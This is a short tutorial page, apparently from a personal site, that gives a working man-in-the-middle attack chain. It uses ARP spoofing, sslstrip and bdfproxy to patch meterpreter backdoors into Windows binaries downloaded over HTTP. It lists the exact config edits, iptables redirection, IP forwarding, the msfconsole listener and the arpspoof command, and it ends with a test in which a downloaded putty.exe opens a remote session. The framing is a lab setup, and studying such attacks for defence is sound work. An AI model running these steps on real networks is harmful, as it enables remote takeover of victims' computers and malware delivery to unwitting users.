|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed 29.03.2017

Man in the Middle with bdfproxy


A man in the middle position means that for some reason all network traffic gets routed through an attackers machine.

man in the middle attack

Such a position allows an attacker to redirect or modify unprotected packages e.g. to steal informations or to deliver malware to a victim.
With the tool bdfproxy this attack can be setup quickly. The proxy recognizes passing binaries for different architectures and can automatically patch a meterpreter inside. As most pages on the internet try to prevent these kind of attacks by using https the example below combines bdfproxy with sslstrip.

setup attacker


As the attacking machine Kali Linux is used. The windows victim is located in the same network so that the man in the middle position can be achieved by spoofing arp messages.

/etc/bdfproxy/bdfproxy.cfg

For the meterpreter to be able to connect back to the attacker the ip addresses have to be modified in the bdfproxy config.

...
proxyMode = regular
...
:%s/192.168.1.168/<attackerIP>/g
:%s/192.168.1.16/<attackerIP>/g

/etc/proxychains

Proxychains will be used to forward the traffic from sslstrip to bdfproxy.

strict_chain
[ProxyList]
http    127.0.0.1 8080

setup routing

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
echo 1 >/proc/sys/net/ipv4/ip_forward

start bdfproxy

bdfproxy

start listener

The tool bdfproxy will create a metasploit script which can be executed with msfconsole.

systemctl start postgresql
msfconsole /usr/share/bdfproxy/bdfproxy_msf_resource.rc

start sslstrip with proxychains

proxychains sslstrip -l 10000

start arpspoof

arpspoof -t <targetIP> -i <iface> -r <gatewayIP>

test attack on victim


To test the attack you can use the windows victim to search for the ssh tool putty.exe and browse to its download page. The download link for the binary should be stripped from https to http.
If you download and run putty.exe on a windows machine a remote meterpreter session should start.

mitmproxy


To only record outgoing TLS traffic use mitmproxy.